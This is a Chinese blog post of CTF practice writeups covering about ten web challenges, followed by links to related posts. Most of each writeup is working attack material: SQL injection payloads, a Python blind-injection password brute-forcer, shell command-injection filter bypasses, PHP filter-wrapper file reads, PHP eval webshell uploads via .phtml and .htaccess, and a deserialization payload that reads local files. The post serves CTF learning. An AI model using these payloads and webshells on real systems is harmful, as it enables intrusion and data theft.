一场练习赛

最新推荐文章于 2023-04-30 20:26:23 发布
最新推荐文章于 2023-04-30 20:26:23 发布
阅读量893 收藏
点赞数
分类专栏: 逗比学CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45963786/article/details/125896460
版权

一场练习赛

文章目录

一.[极客大挑战 2019]EasySQL-万能密码

# 万能公式
1 and 1=1
1' and '1'='1
1 or 1=1 
1' or '1'='1

# payload
1' or '1'='1

二.[NCTF2019]SQLi-

1.访问robots.txt获取提示

User-agent: *
Disallow: /hint.txt
过滤
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
目标
If $_POST['passwd'] === admin's password
sql语句
select * from users where username='1' and passwd='1'

2.爆破

# 利用\将引号转义,联成一个字符串,%00相当于注释
username=\&passwd=||1;%00
# 可以看到返回welcomte.php
# 通过盲注跑出密码
import requests
from urllib import parse
s = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#%&(),-/:;<=>@[\]_`{|}~'
flag=''
url="""http://882c127f-e2ee-4061-9c34-8393bedcf6c3.node4.buuoj.cn:81/index.php"""

while True:
    f=0
    for j in s:
        data = {"username": "\\",
                "passwd":"||passwd/**/regexp/**/\"^{}\";{}".format((flag+j),parse.unquote('%00'))
                }
        # 注意再写python的时候传入%00不能直接传入,直接传会解码直接为空
        res = requests.post(url=url,data=data)
        if "welcome.php" in res.text:
            flag=flag+j
            print(flag)
            f=1
            break
    if f==0:
        break
print(flag)
# 任意用户通过密码登录获得flag

三、[SUCTF 2019]EasySQL-堆叠注入重置操作符

set sql_mode=PIPES_AS_CONCAT;
-- 将||视为字符串的连接操作符而非或运算符
payload

1;set sql_mode=PIPES_AS_CONCAT;select 1

四、[GXYCTF2019]Ping Ping Ping-名利执行绕过

过滤内容
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

?>

绕过空格
{cat,flag.txt} 
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat$IFS$1flag.txt
cat<flag.txt
%09替换
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)
base64绕过
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
拼接绕过
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

注意查看源码

五、[HCTF 2018]WarmUp-目录穿越

# source.php
 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

# hint.php
flag not here, and flag in ffffllllaaaagggg

目录穿越绕过原理

六、[HCTF 2018]WarmUp-php伪协议

通过查看源码和抓包获取到secr3t.php

# secr3t.php
<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

# php伪协议读取文件
?file=php://filter/convert.base64-encode/resource=flag.php

七、[HCTF 2018]WarmUp-phtml文件上传

-----------------------------257135797017926925802823295100
Content-Disposition: form-data; name="upload_file"; filename="一句话.phtml"
Content-Type: image/jpeg

<?php
@eval($_GET['zl']);

-----------------------------257135797017926925802823295100

八、[BSidesCF 2020]Had a bad day -php伪协议

# 读源码
index.php?category=php://filter/convert.base64-encode/resource=index
# index.php
<?php
$file = $_GET['category'];

if(isset($file))
{
    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
        include ($file . '.php');
    }
    else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
# 读flag,根据源码所示,必须包含index
index.php?category=php://filter/convert.base64-encode/index/resource=flag

九、[GXYCTF2019]BabyUpload-.htaccess+js解析php木马

上传.htaccess
-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

AddType application/x-httpd-php .jpeg

-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="submit"

上传
-----------------------------117276979533699198923753878153--

文件利用js解析php语言
-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="uploaded"; filename="a.jpeg"
Content-Type: image/jpeg

GIF89a
<script language="php">@eval($_POST['zl']);</script>

-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="submit"

上传
-----------------------------117276979533699198923753878153--

十、[网鼎杯 2018]Fakebook-sql注入+反序化

相当详细wp

# 注入过程
# 查库
http://4a2f824b-5517-4f61-8e5c-891290c6d4b3.node4.buuoj.cn:81/view.php?no=-1%20union/**/select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3,4

  fakebook,information_schema,mysql,performance_schema,test 
# 查表
union/**/select 1,(select group_concat(table_name) from information_schema.tables where table_schema='fakebook'),3,4

  users
# 查字段
union/**/select 1,(select group_concat(column_name) from information_schema.columns where table_schema='fakebook'),3,4

no,username,passwd,data 
# 查data
union/**/select 1,(select data from fakebook.users),3,4

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:18;s:4:"blog";s:13:"www.baidu.com";} 

# php序列化
<?php

class userinfo{
    public $name='adm';
    public $age='20';
    public $blog='file:///var/www/html/flag.php';
}
$us = new userinfo();
echo serialize($us);

'O:8:"userinfo":3:{s:4:"name";s:3:"adm";s:3:"age";s:2:"20";s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

# 伪造访问
union/**/select 1,2,3,'O:8:"userinfo":3:{s:4:"name";s:3:"adm";s:3:"age";s:2:"20";s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
名为逗比
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
目录穿越及其绕过
web1的博客
09-01 6786
1、目录遍历读取任意文件(相对路径) ?filename=37.jpg /var/www/images/37.jpg …/…/…/etc/passwd 2、绝对路径 3、过滤 …/ ,重写即可 修改filename参数,赋予其值:…//…//…//etc/passwd …//…//…//etc/passwd …/…/…/etc/passwd 4、使用各种url编码(例如…%c0%af或…%252f)来绕过输入过滤器 修改filename参数,赋予它值…%252f…%252f…%252fetc/passw
[HCTF 2018]WarmUp(文件包含,目录穿越)
xlcvv的博客
04-01 1375
https://www.cnblogs.com/leixiao-/p/10265150.html 知识点:目录穿越
目录穿越/遍历漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 4593
目录穿越(目录遍历)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器根目录下的etc目录下的passwd文件的内容。
网站安全(13) ——目录穿越漏洞(Directory Traversal)
weixin_30301183的博客
05-26 1816
如果应用程序使用用户可控制的数据,以危险的方式访问位于应用服务器或其它后端文件系统的文件或目录,就会出现路径遍历。 攻击者可以将路径遍历序列放入文件名内,向上回溯,从而访问服务器上的任何文件,路径遍历序列叫“点-点-斜线”(..\) http://***/go.action?file=..\..\etc\passwd 避开过滤第一种是过滤文件名参数中是否存在任何路径遍历序列(..\)如...
目录穿越/遍历漏洞 -- 学习笔记
热门推荐
angry_program的博客
08-07 2万+
目录 什么是目录遍历? 漏洞原理 实验 0x00 基础目录遍历 0x01 绝对路径 0x02 双写../绕过 0x03 URL编码绕过 0x04 绝对路径配合../ 0x05 截断文件后缀 防御 什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。 在某些情况下,攻击者可能能够在服务器上写入任意文件,(如,FFFTP是一款小型...
天梯赛练习.zip
最新发布
04-21
最后,【天梯赛】不仅仅是一场技术的较量,它也反映了玩家的毅力和坚持不懈的精神。在不断的挑战和自我超越中,玩家不仅可以提高游戏技能,还能收获团队合作的经验和面对挫折的勇气。因此,无论是作为娱乐还是竞技,...
2013年heu寒假集训练习赛AK--第4场
01-24
这些代码片段来自于2013年HEU(哈尔滨工程大学)寒假集训的练习赛,主要涉及了C++编程语言的基础知识,包括字符串处理、循环、条件判断、数组操作等。接下来,我们将深入探讨其中涉及的几个关键知识点。 1. 字符串...
一场精彩的比赛作文.doc
01-11
【描述分析】:“一场精彩的比赛作文.doc”的描述与标题一致,暗示文章内容是对某场比赛的详细叙述,可能是学生的写作练习,由教师陈辉进行指导。 【标签解析】:“范文”标签意味着这篇文档可能被用作写作教学的...
天池 Docker 练习场比赛详细攻略+代码
12-23
本文将详细讲述天池 Docker 练习场的比赛流程,并贴出代码以供参考 1. 比赛内容 题目: 输出 Hello world 计算 /tcdata/num_list.csv 中一列数字的总和 在 /tcdata/num_list.csv 文件中寻找最大的 10 个数,从大到小...
大唐杯省赛练习题第一套
03-08
根据给定的大唐杯省赛练习题第一套的内容,我们可以从中提炼出多个关于5G NR系统中的关键知识点,包括RRC状态的管理、IP地址分配机制、5G核心网架构和服务化架构的理解等。 ### 1. RRC状态管理 #### RRC INACTIVE...
目录穿越/遍历漏洞
小白的劝退之路
01-26 9065
目录 什么是目录遍历? 漏洞原理 实验 0x00 基础目录遍历 0x01 绝对路径 0x02 双写../绕过 0x03 URL编码绕过 0x04 绝对路径配合../ 0x05 截断文件后缀 防御 什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。 在某些情况下,攻击者可能能够在服务...
HFCTF2022 Web ezphp
Sk1y的博客
03-28 5731
HFCTF2022 文章目录HFCTF2022ezphp ezphp 这个题目本来以为考点是p佬的文章,但是不是这样的。 p佬文章:我是如何利用环境变量注入执行任意命令
远程命令/代码执行漏洞(RCE)总结
nigo134的博客
07-04 8610
PHP命令执行函数 1. system() : 原型:string system ( string $command [, int &$return_var ] ) 与passthru的基本相同,但是system返回结果并且输出。(查看system和pssthru的返回值可以看出) 2. shell_exec(): shell_exec — 通过 shell 环境执行命令 ( 这就意味着这个方法只能在 linux 或 mac os的shell环境中运行 ),并且将完整的输出以字符串的方式返
【BUUCTF】Web题解
xuanyulevel6的博客
08-08 5293
【BUUCTF】Web题解
CTF刷题
qq_45655136的博客
08-05 6548
刷题网站:bugku;BUUCTF 本文记录了在刷题过程中所学到的知识点 坚持每天刷5道题,持续更新 坚持就是胜利鸭 CTF 1、bugku–Simple_SSLI_1 根据题目SSLI即服务端模板注入攻击,服务段接收用户输入,将其作为web应用模板的一部分,渲染编译后执行恶意内容,导致敏感信息泄露、代码执行等。 直接F12,发现提示in the flask,set a secret_key flask模板,config是flask模板中的一个全局对象,包含了所有应用程序的配置值。 然后在url输入/?fl
php代码审计题目总结
qq_45927819的博客
12-14 1704
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page))//判断.
奇怪的转义过滤姿势
qq_41996851的博客
04-22 212
Bash 需要用管道做的题,可能过滤了空格、关键字等参数; /?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)
BUUCTF-[GXYCTF2019] Ping Ping Ping
lunan的博客
05-15 994
BUUCTF-[GXYCTF2019] Ping Ping Ping 考点: 1、命令联合执行 2、命令绕过空格的方法 3、内联执行 一、命令联合执行 ; 前面的执行完执行后面的 | 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果) || 当前面的执行出错时(为假)执行后面的 & 将任务置于后台执行 && 前面的语句为假则直接出错,后面的也不执行,前面只能为真 %0a (换行) %0d (回车) 二、命令绕过空格的方法
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1668
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
天勤考研算法练习赛题目-天勤考研算法练习赛
09-09
天勤考研算法练习赛题目-天勤考研算法练习赛是一个考察算法设计和实现能力的竞赛。题目中给出了一组关于球赛开始和结束时间的数据,要求选出能够参与的最大球赛数量。 具体的实现代码如下: ```c++ #include<iostream> #include<queue> #include<algorithm> #include<functional> #include<cstdio> const int MAXN = 100; using namespace std; int main() { #ifdef ONLINE_JUDGE #else freopen("D:\\in.txt", "r", stdin); freopen("D:\\out.txt", "w", stdout); #endif int n(0); while (cin >> n) { if (n == 0) break; pair<int, int> itv[MAXN]; for (int i = 0; i < n; i++) { cin >> itv[i].second >> itv[i].first; } sort(itv, itv + n); int ans(0), t(0);//t是最后所选工作的结束时间 for (int i = 0; i < n; i++) { if (t <= itv[i].second) { ans++; t = itv[i].first; } } cout << ans << endl; } return 0; } ``` 这段代码主要是通过排序给出的球赛时间数据,然后遍历选取能够参与的最大球赛数量,并输出结果。 算法的核心思想是贪心算法。按照球赛结束时间从小到大排序,然后遍历排序后的数据,将能够参与的球赛数量加一,并将最后一场参与的球赛的结束时间作为下一场比赛的开始时间。最后输出能够参与的最大球赛数量。 这样的算法设计可以保证选取的球赛数量最大,并且具有较高的效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值